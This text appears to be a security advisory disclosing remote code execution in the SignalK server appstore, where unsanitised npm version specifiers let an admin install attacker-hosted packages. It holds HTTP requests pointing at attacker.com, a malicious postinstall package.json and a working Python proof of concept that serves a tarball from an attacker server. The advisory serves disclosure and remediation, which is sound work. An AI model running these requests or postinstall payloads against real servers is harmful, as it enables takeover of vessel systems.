"details": "The SignalK appstore interface allows administrators to install npm packages through a REST API endpoint. While the endpoint validates that the package name exists in the npm registry as a known plugin or webapp, the version parameter accepts arbitrary npm version specifiers including URLs. npm supports installing packages from git repositories, GitHub shorthand syntax, and HTTP/HTTPS URLs pointing to tarballs. When npm installs a package, it can automatically execute any `postinstall` script defined in `package.json`, enabling arbitrary code execution.\n\nThe vulnerability exists because npm's version specifier syntax is extremely flexible, and the SignalK code passes the version parameter directly to npm without sanitization. An attacker with admin access can install a package from an attacker-controlled source containing a malicious `postinstall` script.\n\n### Affected Code\n\n**File**: `src/interfaces/appstore.js` (lines 46-76)\n\n```javascript\napp.post(\n [\n `${SERVERROUTESPREFIX}/appstore/install/:name/:version`,\n `${SERVERROUTESPREFIX}/appstore/install/:org/:name/:version`\n ],\n (req, res) => {\n let name = req.params.name\n const version = req.params.version // No validation on version format\n \n // ... validation only checks if package name exists ...\n \n installSKModule(name, version) // Passes unsanitized version to npm\n }\n)\n```\n\n**File**: `src/modules.ts` (lines 180-205)\n\n```typescript\nif (name) {\n packageString = version ? `${name}@${version}` : name // Direct concatenation\n}\n\nif (process.platform === 'win32') {\n npm = spawn('cmd', ['/c', `npm --save ${command} ${packageString}`], opts)\n} else {\n npm = spawn('npm', ['--save', command, packageString], opts)\n}\n```\n\n### Impact\n\nAn attacker with admin credentials (obtained via the authentication bypass chain) can execute arbitrary commands on the server with the privileges of the SignalK process. This enables complete system compromise including data theft, backdoor installation, lateral movement, and denial of service.\n\nA compromised server can inject malicious PGN messages onto the NMEA 2000 bus or forge NMEA 0183 sentences, affecting all connected devices. Attack scenarios include manipulating autopilot systems (Pypilot, Raymarine, Garmin) via the Autopilot API to alter vessel course, spoofing AIS messages to create phantom vessels on radar, altering GPS position data sent to chart plotters and autopilots, injecting false depth sounder readings, manipulating wind instrument data, or sending shutdown commands to electronically controlled engines via NMEA 2000. Many vessels expose SignalK to the internet for remote monitoring, making them globally accessible to attackers.\n\nThe vulnerability can be exploited using any of npm's flexible version specifier formats:\n\n**1. Real npm Package with Required Keyword**\n\n```http\nPOST /skServer/appstore/install/malicious-signalk-plugin/1.0.0 HTTP/1.1\nHost: localhost:3000\nAuthorization: Bearer <VALID_AUTH_TOKEN>\nContent-Length: 0\n```\n\nPublishing a malicious package to the official npm registry with the `signalk-node-server-plugin` or `signalk-webapp` keyword allows us to install arbitrary npm packages using standard semantic versioning format (`1.0.0`). This is non-stealthy as the package is publicly visible, but can be leveraged to spread malware via npm's ecosystem, since such a package will show up on the webapp feed and other users might install it.\n\n**2. Real npm Package via npm Alias**\n\n```http\nPOST /skServer/appstore/install/signalk-pushover-plugin/npm:
[email protected] HTTP/1.1\nHost: localhost:3000\nAuthorization: Bearer <VALID_AUTH_TOKEN>\nContent-Length: 0\n```\n\nThe `npm:` prefix allows installing a package under a different name. For example, `npm:
[email protected]` installs `malicious-package` but references it as if it were the legitimate `signalk-pushover-plugin`. This obscures the actual package being installed from casual inspection, making it stealthier while still requiring npm publishing.\n\n**3. Package Hosted on GitHub (GitHub Shorthand)**\n\n```http\nPOST /skServer/appstore/install/signalk-pushover-plugin/attacker%2Fmalicious-plugin HTTP/1.1\nHost: localhost:3000\nAuthorization: Bearer <VALID_AUTH_TOKEN>\nContent-Length: 0\n```\n\nThe format `username/repo` (URL-encoded as `attacker%2Fmalicious-plugin`) is shorthand for `github:username/repo`. npm automatically fetches the repository from GitHub, extracts it, and runs `npm install`. If the repo contains a `postinstall` script, it executes. The repository must contain a valid `package.json` with the malicious script.\n\n**4. Package Hosted on Attacker-Controlled Git Server (git+ Protocol)**\n\n```http\nPOST /skServer/appstore/install/signalk-pushover-plugin/git%2Bhttps:%2F%2Fattacker.com%2Fmalicious-plugin.git HTTP/1.1\nHost: localhost:3000\nAuthorization: Bearer <VALID_AUTH_TOKEN>\nContent-Length: 0\n```\n\nThe `git+https://` or `git+ssh://` prefix tells npm to clone a git repository. This works with any git server, not just GitHub. The attacker has full control over the repository contents and can update it at any time. This provides maximum control over the package source without relying on third-party services.\n\n**5. Package Hosted on Attacker Webserver as Tarball**\n\n```http\nPOST /skServer/appstore/install/signalk-pushover-plugin/http:%2F%2Fattacker.com%2Fpkg.tgz HTTP/1.1\nHost: localhost:3000\nAuthorization: Bearer <VALID_AUTH_TOKEN>\nContent-Length: 0\n```\n\nThe `http://` or `https://` URL pointing to a `.tgz` file tells npm to download and extract the tarball. This is the most flexible method as it requires no external service dependencies - the attacker controls both the package contents and the hosting infrastructure. No git repository or npm registry account needed.\n\nAll methods result in npm executing the `postinstall` script from the attacker-controlled package. A malicious npm package requires only two files to achieve RCE:\n\n**package.json** - Defines the package metadata and the malicious script:\n```json\n{\n \"name\": \"signalk-evil-plugin\",\n \"version\": \"1.0.0\",\n \"keywords\": [\"signalk-node-server-plugin\"],\n \"scripts\": {\n \"postinstall\": \"node -e \\\"require('child_process').exec('calc.exe')\\\"\"\n }\n}\n```\n\nThe `postinstall` script executes automatically after npm installs the package.\n\n**index.js** - Minimal plugin implementation to avoid errors:\n```javascript\nmodule.exports = function(app) {\n return {\n id: 'evil-plugin',\n name: 'Evil Plugin',\n start: function() {},\n stop: function() {}\n }\n}\n```\n\n### PoC using the tarball variant of the exploit\n\n```python\nimport requests\nimport tarfile\nimport json\nimport io\nimport threading\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\nfrom urllib.parse import quote\n\nTARGET = \"http://localhost:3000\"\nATTACKER_IP = \"localhost\"\nATTACKER_PORT = 9999\nRCE_COMMAND = \"calc.exe\" # Windows; use \"id > /tmp/pwned\" for Linux\nTOKEN = \"<VALID_AUTH_TOKEN>\"\n\ndef create_malicious_tarball():\n package_json = {\n \"name\": \"signalk-evil-plugin\",\n \"version\": \"1.0.0\",\n \"keywords\": [\"signalk-node-server-plugin\"],\n \"scripts\": {\n \"postinstall\": f\"node -e \\\"require('child_process').exec('{RCE_COMMAND}')\\\"\"\n }\n }\n \n index_js = b\"module.exports = function(app) { return { id: 'evil', start: function(){}, stop: function(){} } }\"\n \n tar_buffer = io.BytesIO()\n with tarfile.open(fileobj=tar_buffer, mode='w:gz') as tar:\n # Add package.json\n pkg_data = json.dumps(package_json, indent=2).encode()\n pkg_info = tarfile.TarInfo(name=\"package/package.json\")\n pkg_info.size = len(pkg_data)\n tar.addfile(pkg_info, io.BytesIO(pkg_data))\n \n # Add index.js\n idx_info = tarfile.TarInfo(name=\"package/index.js\")\n idx_info.size = len(index_js)\n tar.addfile(idx_info, io.BytesIO(index_js))\n \n return tar_buffer.getvalue()\n\ndef start_malicious_server(tarball_data):\n class Handler(BaseHTTPRequestHandler):\n def do_GET(self):\n print(f\"[+] Victim fetched malicious package!\")\n self.send_response(200)\n self.send_header(\"Content-Type\", \"application/gzip\")\n self.send_header(\"Content-Length\", len(tarball_data))\n self.end_headers()\n self.wfile.write(tarball_data)\n \n def log_message(self, *args):\n pass\n \n server = HTTPServer((\"0.0.0.0\", ATTACKER_PORT), Handler)\n thread = threading.Thread(target=server.serve_forever, daemon=True)\n thread.start()\n print(f\"[+] Malicious server running on port {ATTACKER_PORT}\")\n return server\n\ndef trigger_rce(token):\n tarball_url = f\"http://{ATTACKER_IP}:{ATTACKER_PORT}/package.tgz\"\n encoded_url = quote(tarball_url, safe='')\n \n url = f\"{TARGET}/skServer/appstore/install/signalk-pushover-plugin/{encoded_url}\"\n \n headers = {\"Authorization\": f\"Bearer {token}\"}\n \n print(f\"[*] Triggering installation from {tarball_url}\")\n r = requests.post(url, headers=headers)\n print(f\"[+] Response: {r.status_code} - {r.text}\")\n\nif __name__ == \"__main__\":\n tarball = create_malicious_tarball()\n print(f\"[+] Created malicious tarball ({len(tarball)} bytes)\")\n \n start_malicious_server(tarball)\n trigger_rce(TOKEN)\n```\n\n### Recommendation\n\n1. Restrict package installation to the official npm registry only by validating that version parameters match semver format\n2. Use npm's `--ignore-scripts` flag to prevent automatic script execution\n3. Implement an allowlist of approved packages\n4. Consider sandboxing the package installation process\n\nWhile we understand that allowing 3rd party plugin installation is an intended functionality we believe that more secure practices must be applied to the whole process given the operational importance a SignalK instance can have onboard a vessel and it's rise in polularity.",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments